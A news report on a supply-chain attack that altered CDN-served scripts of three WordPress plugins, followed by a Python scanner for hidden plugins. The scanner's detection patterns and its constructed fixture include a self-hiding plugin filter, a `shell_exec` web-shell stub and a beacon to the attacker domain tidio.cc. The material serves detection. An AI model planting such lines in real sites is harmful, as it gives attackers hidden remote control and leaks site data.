A major supply-chain security incident has been uncovered involving widely used WordPress plugins, where attackers tampered with legitimate JavaScript files to secretly compromise websites.
Security researchers at Sansec discovered that trusted scripts used by PushEngage, OptinMonster, and TrustPulse were modified and turned into a hidden backdoor mechanism capable of taking over websites running these plugins.
The malicious activity was designed to activate only under specific conditions. When a website administrator was logged into WordPress and loaded the compromised script, the injected code would silently execute actions using the admin’s active session. This allowed attackers to create a new administrator account under their control and install a hidden plugin that enabled persistent remote access.
Regular site visitors were not affected, making the attack difficult to detect through normal browsing or dashboard checks.
Widespread Exposure Through Trusted Plugins
All three affected plugins are developed under the same company, Awesome Motive. Sansec reported that the malicious code was present across all three services’ JavaScript files, indicating a coordinated supply-chain compromise.
PushEngage later confirmed that its scripts had been tampered with and warned that any site loading the affected files could be fully compromised. However, OptinMonster and TrustPulse had not issued detailed public guidance at the time of reporting.
The exposure windows varied. OptinMonster and TrustPulse were reportedly affected for only about 25 minutes on June 12 before the malicious code was removed. PushEngage, however, experienced a longer exposure lasting several hours, with some infected scripts still being served from CDN servers until June 14.
Collectively, the plugins are estimated to impact more than 1.2 million websites, though the actual number of compromised sites is expected to be lower.
How the Attack Worked
The injected JavaScript was designed to remain inactive during normal website visits. It only executed when a logged-in WordPress administrator accessed the site.
Once triggered, it leveraged the administrator’s session to perform high-privilege actions, including:
- Creating a hidden admin account controlled by attackers
- Installing a concealed plugin that does not appear in the WordPress dashboard
- Exfiltrating site data and credentials to a malicious domain (tidio.cc)
The hidden plugin effectively acted as a web shell, allowing attackers to remotely execute commands on the compromised server without authentication. This gave them the ability to modify files, access databases, inject malicious scripts, or maintain persistent control.
To ensure continued access, attackers also created additional admin accounts as backup entry points.
Possible Entry Point and Dispute
The exact method of initial compromise remains unclear. PushEngage claims the attackers may have exploited a vulnerability in the UpdraftPlus WordPress backup plugin on its marketing infrastructure, allowing them to steal a CDN API key.
With that key, attackers would not need to breach core systems directly. Instead, they could alter files distributed through the CDN to thousands of customer websites.
However, security researchers note that the true entry point has not been confirmed. Possibilities include compromised internal servers or CDN credentials, but no final conclusion has been reached. UpdraftPlus does contain a known high-severity vulnerability (now patched), but its role in this attack remains unverified.
Impact and Response
PushEngage stated that its core systems and customer databases were not directly breached. The issue was isolated to CDN-served scripts. The company has since rotated credentials, replaced malicious files, and cleared cached content.
Despite this, experts warn that any site affected during the attack window should still be treated as compromised. Removing the plugin or admin account alone may not eliminate all backdoors.
What Website Owners Should Do
Security researchers recommend immediate action for any WordPress site that used PushEngage, OptinMonster, or TrustPulse during the incident window:
- Perform a full server-side security scan (not just dashboard checks)
- Inspect wp-content/plugins for suspicious folders or hidden components
- Review admin accounts for unauthorized additions
- Check server logs for outbound connections to suspicious domains such as tidio.cc
- Rotate all credentials, including admin passwords, database access, API keys, and WordPress security salts
Because the malware is designed to hide from the WordPress dashboard, only deep server-level inspection can reliably determine whether a site has been compromised.
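The server-side inspection of wp-content/plugins recommended above, as an added example that is not code from the article, Sansec or the affected vendors: it scans plugin files for indicators the article names (the tidio.cc domain, a plugin that hides itself from the dashboard, command execution) and, when given no path, runs against a constructed sample tree. The indicator names and the hidden-plugin folder name are assumptions for illustration.

```python
import os
import re
import sys
import tempfile
from pathlib import Path

# Server-side indicators taken from the article: the exfiltration domain, a plugin that
# hides itself from the dashboard (the WordPress 'all_plugins' filter is the usual way),
# and web-shell style command execution.
INDICATORS = {
    "exfil_domain": re.compile(r"tidio\.cc", re.I),
    "hides_from_dashboard": re.compile(r"add_filter\s*\(\s*['\"]all_plugins['\"]", re.I),
    "obfuscated_eval": re.compile(r"\beval\s*\(\s*base64_decode\s*\(", re.I),
    "command_exec": re.compile(r"\b(?:shell_exec|passthru|system|exec)\s*\(", re.I),
}

def scan_plugins_dir(plugins_dir: str) -> dict[str, list[str]]:
    """Walk wp-content/plugins and map each plugin folder to the indicator names it matched."""
    findings: dict[str, set[str]] = {}
    for root, _dirs, files in os.walk(plugins_dir):
        for name in files:
            if not name.endswith((".php", ".js")):
                continue
            path = Path(root) / name
            text = path.read_text(errors="ignore")
            plugin = path.relative_to(plugins_dir).parts[0]
            hits = {k for k, rx in INDICATORS.items() if rx.search(text)}
            if hits:
                findings.setdefault(plugin, set()).update(hits)
    return {plugin: sorted(hits) for plugin, hits in findings.items()}

def build_constructed_sample() -> str:
    """Constructed fixture (not real malware): a benign plugin beside a self-hiding web shell."""
    plugins = Path(tempfile.mkdtemp()) / "wp-content" / "plugins"
    (plugins / "hello-dolly").mkdir(parents=True)
    (plugins / "hello-dolly" / "hello.php").write_text("<?php\n// harmless\necho 'hi';\n")
    (plugins / "wp-core-helper").mkdir()
    (plugins / "wp-core-helper" / "loader.php").write_text(
        "<?php\n"
        "add_filter('all_plugins', function($p){ unset($p['wp-core-helper/loader.php']); return $p; });\n"
        "echo shell_exec($cmd); // constructed stand-in for the web-shell behaviour\n"
        "@file_get_contents('https://tidio.cc/collect'); // constructed beacon\n"
    )
    return str(plugins)

if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else build_constructed_sample()
    for plugin, hits in scan_plugins_dir(target).items():
        print(f"{plugin}: {', '.join(hits)}")
```

Point it at a real install with `python scan.py /path/to/wp-content/plugins`; a match is a lead to inspect by hand (some legitimate plugins also hook `all_plugins`), and a clean scan does not prove the site is clean.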